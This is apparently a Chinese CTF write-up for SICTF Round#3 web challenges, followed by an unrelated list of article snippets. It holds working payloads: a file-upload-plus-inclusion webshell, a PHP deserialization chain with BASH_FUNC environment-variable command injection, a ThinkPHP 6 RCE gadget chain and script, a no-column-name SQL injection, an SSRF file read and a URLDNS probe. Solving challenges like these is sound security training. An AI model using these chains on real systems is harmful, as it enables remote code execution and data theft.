SICTF Round#3 Web方向 题解WP

100%_upload

题目描述:小茂夫说:一直上传恶意文件尊嘟要生气了,世事莫固守,转变思路求突破

开题,注意有个文件包含

image-20240216180237786

题目把后缀过滤死了,无法上传php后缀文件。文件内容些许过滤,短标签即可绕过。

这题文件上传+文件包含。上传txt后缀木马,直接包含即可。

image-20240216180134075

image-20240216180153332

Not just unserialize

题目描述:看似平平无奇的反序列化题,出题人却在dockerfile里添加了这样一行奇怪命令:RUN ln -sf /bin/bash /bin/sh……

首先分析一下题目描述:RUN ln -sf /bin/bash /bin/sh

这条Docker命令 RUN ln -sf /bin/bash /bin/sh 在构建Docker镜像时执行,用于在Linux环境下创建或更新一个符号链接,即它会将 /bin/sh 指向 /bin/bash

  • RUN: Dockerfile中的指令,用于在镜像构建过程中执行命令。
  • ln: Linux命令,用于创建链接,包括硬链接和符号链接。
  • -sf:
    • -s: 指定创建的是符号链接,而不是硬链接。符号链接类似于Windows中的快捷方式,指向另一个文件。
    • -f: 强制执行。如果目标文件(在这个例子中是 /bin/sh)已存在,它将被无提示删除并重新创建链接。这确保了即使 /bin/sh 已存在,链接也会被更新为指向 /bin/bash
  • /bin/bash: 这是链接的目标,即当你访问或执行 /bin/sh 时,实际上是访问或执行的文件。
  • /bin/sh: 这是要创建或更新的符号链接的路径。

在许多Linux发行版中,/bin/sh 默认可能指向不同的Shell,如dash或其他轻量级Shell。

这个命令确保在Docker镜像中,当任何过程或脚本尝试通过/bin/sh执行Shell脚本时,实际使用的是Bash Shell,而不是系统默认的Shell。

开题。

image-20240216184829109

源码:

<?phphighlight_file(__FILE__);
class start
{public $welcome;public $you;public function __destruct(){$this->begin0fweb();}public  function begin0fweb(){$p='hacker!';$this->welcome->you = $p;}
}class SE{public $year;public function __set($name, $value){echo '  Welcome to new year!  ';echo($this->year);}
}class CR {public $last;public $newyear;public function __tostring() {if (is_array($this->newyear)) {echo 'nonono';return false;}if (!preg_match('/worries/i',$this->newyear)){echo "empty it!";return 0;}if(preg_match('/^.*(worries).*$/',$this->newyear)) {echo 'Don\'t be worry';} else {echo 'Worries doesn\'t exists in the new year  ';empty($this->last->worries);}return false;}
}class ET{public function __isset($name){foreach ($_GET['get'] as $inject => $rce){putenv("{$inject}={$rce}");}system("echo \"Haven't you get the secret?\"");}
}
if(isset($_REQUEST['go'])){unserialize(base64_decode($_REQUEST['go']));
}
?>

函数解释:

empty():

检查一个变量是否为空

判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于**FALSE**,那么它会被认为不存在。如果变量不存在的话,**empty()**并不会产生警告。

putenv():

设置环境变量的值

bool putenv( string $setting)

添加 setting 到服务器环境变量。 环境变量仅存活于当前请求期间。 在请求结束时环境会恢复到初始状态。

设置特定的环境变量也有可能是一个潜在的安全漏洞。 safe_mode_allowed_env_vars 包含了一个以逗号分隔的前缀列表。 在安全模式下,用户可以仅能修改用该指令设定的前缀名称的指令。 默认情况下,用户仅能够修改以 PHP_ 开头的环境变量(例如 PHP_FOO=BAR)。 注意:如果此指令是空的,PHP允许用户设定任意环境变量!

safe_mode_protected_env_vars 指令包含了逗号分隔的环境变量列表,使用户最终无法通过 putenv() 修改。 即使 safe_mode_allowed_env_vars 设置允许修改,这些变量也会被保护。

反序列化最后一步利用是环境变量注入,那就讲通了,题目描述中的docker语句是为了环境变量注入做准备的:

我是如何利用环境变量注入执行任意命令 | 离别歌 (leavesongs.com)

反序列化链子:

//start::__destruct()->start::begin0fweb()->SE::__set()->CR::__tostring()->ET::__isset()

POC:

<?phphighlight_file(__FILE__);
class start
{public $welcome;public $you;public function __destruct(){$this->begin0fweb();}public  function begin0fweb(){$p='hacker!';$this->welcome->you = $p;}
}class SE{public $year;public function __set($name, $value){echo '  Welcome to new year!  ';echo($this->year);}
}class CR {public $last;public $newyear;public function __tostring() {if (is_array($this->newyear)) {echo 'nonono';return false;}if (!preg_match('/worries/i',$this->newyear)){echo "empty it!";return 0;}if(preg_match('/^.*(worries).*$/',$this->newyear)) {echo 'Don\'t be worry';} else {echo 'Worries doesn\'t exists in the new year  ';empty($this->last->worries);}return false;}
}class ET{public function __isset($name){foreach ($_GET['get'] as $inject => $rce){putenv("{$inject}={$rce}");}system("echo \"Haven't you get the secret?\"");}
}//start::__destruct()->start::begin0fweb()->SE::__set()->CR::__tostring()->ET::__isset()$a=new start();
$a->welcome=new SE();
$a->welcome->year=new CR();
$a->welcome->year->newyear="\x0aworries";
$a->welcome->year->last=new ET();echo base64_encode(serialize($a));?>

传参如下:(有个编码问题,是个坑)

?get[BASH_FUNC_echo%25%25]=() { tac /ffffllllllaaaaaaaaaaaaaaaaaaggggg; };go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX1zOjM6InlvdSI7Tjt9

image-20240216205545963

hacker

题目描述:这好像不是简单的sql注入

开题,源码有提示

image-20240218195140983

直接查询没有反应

image-20240218195351064

burp打一下fuzz,发现过滤了以下部分

image-20240218195553025

这题考无列名注入,可以看我的文章(才发现这篇访问有9k啊啊啊):NSS [HNCTF 2022 WEEK2]easy_sql_nss上的sql-CSDN博客

payload:

1'/**/union/**/select/**/`2`/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)xxx%23

image-20240218200819659

Oyst3rPHP

题目描述:I think that Oyst3rphp is the best

开题,看饿了

image-20240218201154139

没啥发现,骚一波看看,收获满满

image-20240218201406166

源码readme发现是TP6

image-20240218201618345

工具检测不到

image-20240218201720974

所以我们再看看源码。估计有部分改动,我们要手动打。

/app/controller/index.php

<?php
namespace app\controller;
use app\BaseController;class Index extends BaseController
{public function index(){echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";echo "<img src='../Oyster.png'"."/>";$payload = base64_decode(@$_POST['payload']);$right = @$_GET['left'];$left = @$_GET['right'];$key = (string)@$_POST['key'];if($right !== $left && md5($right) == md5($left)){echo "Congratulations on getting your first oyster";echo "<img src='../Oyster1.png'"."/>";if(preg_match('/.+?THINKPHP/is', $key)){die("Oysters don't want you to eat");}if(stripos($key, '603THINKPHP') === false){die("!!!Oysters don't want you to eat!!!");}echo "WOW!!!Congratulations on getting your second oyster";echo "<img src='../Oyster2.png'"."/>";@unserialize($payload);//最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么???//在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!!//小Tips:细狗函数┗|`O′|┛ 嗷~~}}public function doLogin(){/*emmm我也不知道这是what,瞎写的*/if ($this->request->isPost()) {$username = $this->request->post('username');$password = $this->request->post('password');if ($username == 'your_username' && $password == 'your_password') {$this->success('Login successful', 'index/index');} else {$this->error('Login failed');}}}}

注意这里有一个反序列化点,猜测反序列化可以直接利用。

image-20240218204230837

我们只需要绕一下md5弱比较和正则回溯限制就行。由于回溯限制包比较大,我们直接用脚本发包。

import requestsurl = "http://yuanshen.life:38909/?left=s878926199a&right=s1091221200a"data ={"key":'.'*1000100+"603THINKPHP","payload":"【xxx】"}r = requests.post(url,data).text
print(r)

TP6利用链子:

<?phpnamespace think\model {use think\Model;class Pivot extends Model {}
}namespace think {abstract class Model {private $lazySave = false;private $data = [];protected $withEvent = true;private $exists = false;private $force = false;protected $table;private $withAttr = [];public function __construct($obj = '') {$this->lazySave = true;$this->data = array('Jay17'=>'cat /Oyst3333333r.php');$this->withEvent = false;$this->exists = true;$this->force = true;$this->table = $obj;$this->withAttr = array('Jay17'=>'system');}}}namespace {use think\model\Pivot;echo base64_encode(serialize(new Pivot(new Pivot())));}

flag在/Oyst3333333r.php(卡了好久。。)

最后POC:

import requestsurl = "http://yuanshen.life:38909/?left=s878926199a&right=s1091221200a"data ={"key":'.'*1000100+"603THINKPHP","payload":"TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NToiSmF5MTciO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjg6IgAqAHRhYmxlIjtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Nzp7czoyMToiAHRoaW5rXE1vZGVsAGxhenlTYXZlIjtiOjE7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJKYXkxNyI7czoyMToiY2F0IC9PeXN0MzMzMzMzM3IucGhwIjt9czoxMjoiACoAd2l0aEV2ZW50IjtiOjA7czoxOToiAHRoaW5rXE1vZGVsAGV4aXN0cyI7YjoxO3M6MTg6IgB0aGlua1xNb2RlbABmb3JjZSI7YjoxO3M6ODoiACoAdGFibGUiO3M6MDoiIjtzOjIxOiIAdGhpbmtcTW9kZWwAd2l0aEF0dHIiO2E6MTp7czo1OiJKYXkxNyI7czo2OiJzeXN0ZW0iO319czoyMToiAHRoaW5rXE1vZGVsAHdpdGhBdHRyIjthOjE6e3M6NToiSmF5MTciO3M6Njoic3lzdGVtIjt9fQ=="}r = requests.post(url,data).text
print(r)

image-20240218205707447

EZ_SSRF

题目描述:送你们点分,flag位于/flag哦~

直接给了源码:

<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);$data = curl_exec($curl);curl_close($curl);echo base64_encode($data);return $data;
}
class client{public $url;public $payload;public function __construct(){$url = "http://127.0.0.1/";$payload = "system(\"cat /flag\");";echo "Exploit";}public function __destruct(){get($this->url);}
}
// hint:hide other file
if(isset($_GET['Harder'])) {unserialize($_GET['Harder']);
} else {echo "You don't know how to pass parameters?";
}?>

flag不在/flag。payload变量不会执行,我们注意力放在url变量上,file协议直接读。

POC:

<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);$data = curl_exec($curl);curl_close($curl);echo base64_encode($data);return $data;
}
class client{public $url;public $payload;public function __construct(){$url = "http://127.0.0.1/";$payload = "system(\"cat /flag\");";echo "Exploit";}public function __destruct(){get($this->url);}
}$a=new client();
$a->url='file:///var/www/html/flag.php';
echo serialize($a);

image-20240218202923197

payload:

?Harder=O:6:"client":2:{s:3:"url";s:29:"file:///var/www/html/flag.php";s:7:"payload";N;}

base64解码

image-20240218202939395

[进阶]elInjection【*】

题目描述:快写个exp打死我!

hint:

利用ScriptEngine基础上可以使用Base64编码Bypass

非预期解法dns出网情况下,dns换行导致解析失败可以使用命令,ls /|head -n 1|tail -n -1,来读取行数

flag没有权限读取,执行/readflag获取

套双层ScriptEngineManager的eval执行java.util.Base64解码内容

开题

image-20240219004411863

[进阶]CC_deserialization【*】

题目描述:最近jack想学cc链,他请教了一位师傅,师傅为了考验他的能力,给了他一个网址和jar包,让他拿到地址中的flag,可是jack拿到网址后一脸懵逼,所以来找你求救,你能帮助他吗?(jdk版本1.8.0_65)

先把jar包用IDEA打开看看。用的是CC1

image-20240218211858786

先打一下URLDNS,看看出网否,出网。

exp=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//3QAGGRjdmV4eWs3LnJlcXVlc3RyZXBvLmNvbXQAAHEAfgAFdAAEaHR0cHB4dAAfaHR0cDovL2RjdmV4eWs3LnJlcXVlc3RyZXBvLmNvbXg=

image-20240218213106433

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/691416.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

算法-贪心算法

题目&#xff1a;给定一个字符串str&#xff0c;只由‘X’和‘.’两种字符构成。‘X’表示墙&#xff0c;不能放灯&#xff0c;也不需要点亮‘.’表示居民点&#xff0c;可以放灯&#xff0c;需要点亮如果灯放在i位置&#xff0c;可以让i-1&#xff0c;i和i1三个位置被点亮返回…

在ubuntu20.04 上配置 qemu/kvm linux kernel调试环境

一&#xff1a;安装qemu/kvm 和 virsh qemu/kvm 是虚拟机软件&#xff0c;virsh是管理虚拟机的命令行工具&#xff0c;可以使用virsh创建&#xff0c;编辑&#xff0c;启动&#xff0c;停止&#xff0c;删除虚拟机。 &#xff08;1&#xff09;&#xff1a;安装之前&#xff0c…

LLM应用开发与落地:chroma的近似搜索问题

背景 最近开始测试一个游戏客户的RAG模块&#xff0c;发现一个向量数据库中大家容易忽略的一个点&#xff1a;近邻搜索算法。一开始我们选择的是chroma作为向量数据库&#xff0c;因为chroma的用户接口和设计非常简单&#xff0c;而我偏向于简单。创建collection时设置的距离计…

2024牛客寒假算法基础集训营4

文章目录 A-柠檬可乐B-左右互博C-冬眠D-守恒E-漂亮数组G-数三角形&#xff08;easy&#xff09; A-柠檬可乐 #include<bits/stdc.h> #define endl \n #define int long long using namespace std; int a,b,k; void solve() {cin>>a>>b>>k;if(a>k*b…

EasySass: could not generate CSS file. See Output panel for details.微信小程序报错及解决

解决微信小程序导入vscode的easysass包报错 问题发现问题来源和解决制作不易&#xff0c;感谢三联&#xff0c;谢谢大家啦 问题发现 当我喜滋滋的在vscode中导入easysass包之后&#xff0c;又在微信小程序中添加vscode扩展&#xff0c;又去文件中改好了配置文件后却直接弹出了…

npm run dev运行出现NODE_OPTIONS=--max_old_space_size=4096 vite --mode dev --host?

问题描述 PS E:\AWorkDataease\DataEase\core\core-frontend> npm run dev dataease0.0.0 dev NODE_OPTIONS–max_old_space_size4096 vite --mode dev --host 0.0.0.0 ‘NODE_OPTIONS’ 不是内部或外部命令&#xff0c;也不是可运行的程序 或批处理文件。 解决方案 遇到…

生成对抗网络----GAN

系列文章目录 文章目录 系列文章目录前言一、基本构成二、应用领域三、基本原理四、如何训练GAN 前言 一、基本构成 GAN (Generative Adversarial Network) : 通过两个神经网络&#xff0c;即生成器&#xff08;Generator&#xff09;和判别器&#xff08;Discriminator&#…

AtCoder Beginner Contest 341 D - Only one of two (Java)

AtCoder Beginner Contest 341 D - Only one of two (Java) 比赛链接&#xff1a;AtCoder Beginner Contest 341 D题传送门AtCoder&#xff1a;D - Only one of two D题传送门洛谷&#xff1a;[ABC341D] Only one of two 题目&#xff1a;[ABC341D】 Only one of two 题目…

padding属性顺序

padding 一个属性值应用四个边&#xff0c; 二个属性值&#xff0c;先上下&#xff0c;后左右 三个属性值&#xff0c;前上&#xff0c;中左右&#xff0c;最后是下 四个属性值&#xff0c;从上边开始&#xff0c;顺时针开始&#xff0c;上&#xff0c;右&#xff0c;下&…

安卓游戏开发之图形渲染技术优劣分析

一、引言 随着移动设备的普及和性能的提升&#xff0c;安卓游戏开发已经成为一个热门领域。在安卓游戏开发中&#xff0c;图形渲染技术是关键的一环。本文将对安卓游戏开发中常用的图形渲染技术进行分析&#xff0c;比较它们的优劣&#xff0c;并探讨它们在不同应用场景下的适用…

C/C++ BM12 单链表的排序

文章目录 前言题目解决方案一1.1 思路阐述1.2 源码 解决方案二2.1 思路阐述2.2 源码 总结 前言 链表排序处理起来比较麻烦&#xff0c;因为它不支持下标操作。这里写一下链表排序的常用方法。 题目 描述 给定一个节点数为n的无序单链表&#xff0c;对其按升序排序。 数据范围…

【论文阅读笔记】AutoAugment:Learning Augmentation Strategies from Data

AutoAugment:Learning Augmentation Strategies from Data 摘要 &#x1f52c; 研究方法: 本文描述了一种名为AutoAugment的简单程序&#xff0c;通过这个程序可以自动寻找改进的数据增强策略。研究设计了一个策略空间&#xff0c;其中策略包含多个子策略&#xff0c;在每个小…

python+django+vue汽车票在线预订系统58ip7

本课题使用Python语言进行开发。基于web,代码层面的操作主要在PyCharm中进行&#xff0c;将系统所使用到的表以及数据存储到MySQL数据库中 使用说明 使用Navicat或者其它工具&#xff0c;在mysql中创建对应名称的数据库&#xff0c;并导入项目的sql文件&#xff1b; 使用PyChar…

好书推荐丨《细说机器学习:从理论到实践》

文章目录 写在前面机器学习推荐图书内容简介编辑推荐作者简介 推荐理由粉丝福利写在最后 写在前面 本期博主给大家推荐一本有关机器学习的全新正版书籍&#xff0c;对机器学习、人工智能感兴趣的小伙伴们快来看看吧~ 机器学习 机器学习&#xff08;Machine Learning, ML&…

※【回溯】【深度优先前序】Leetcode 257. 二叉树的所有路径

※【回溯】【深度优先前序】Leetcode 257. 二叉树的所有路径 解法0 迭代法解法1 深度优先 前序解法2 深度优先 前序 添加了StringBulider ---------------&#x1f388;&#x1f388;257. 二叉树的所有路径 题目链接&#x1f388;&#x1f388;------------------- 解法0 迭代法…

08MARL深度强化学习 independent learning

文章目录 前言1、Independent Value-based Learning2、Independent Policy Gradient Methods 前言 记录independent learning算法的基础概念&#xff0c;使用一些RL算法训练多智能体 1、Independent Value-based Learning 基于值的独立学习算法&#xff1a;每个智能体根据自身…

十一、Nacos源码系列:Nacos配置中心原理(三)- 配置热更新

上面章节我们讲了服务启动的时候从远程 Nacos 服务端拉到配置&#xff0c;以及服务启动后对需要支持热更新的配置都注册了一个监听器&#xff0c;这个章节我们来说下配置变动后具体是怎么处理的。 回到前面文章说过的 NacosPropertySourceLocator 的 locate()方法看看&#xff…

浅谈前端性能优化的方法

前端性能优化是一个多方面的过程&#xff0c;涉及减少加载时间、提高响应速度、优化渲染等方面。以下是一些常见的前端性能优化方法&#xff1a; 减少HTTP请求&#xff1a;合并CSS和JavaScript文件&#xff0c;使用CSS Sprite技术&#xff0c;以及使用HTTP2.0等协议来减少HTTP…

51-2 万字长文,深度解读端到端自动驾驶的挑战和前沿

去年初&#xff0c;我曾打算撰写一篇关于端到端自动驾驶的文章&#xff0c;发现大模型在自动驾驶领域的尝试案例并不多。遂把议题扩散了一点&#xff0c;即从大模型开始&#xff0c;逐渐向自动驾驶垂直领域靠近&#xff0c;最后落地到端到端。这样需要阐述的内容就变成LLM基础模…

【Docker】集群容器监控和统计 Portainer基本用法

Portainer是一款轻量级的应用&#xff0c;它提供了图形化界面&#xff0c;用川于方便地管理Docker环境&#xff0c;包括单机环境和集群环境。 主要功能&#xff1a;实现集群容器的监控和统计 下载安装 官网&#xff1a;https://www.portainer.io 文档&#xff1a;https://do…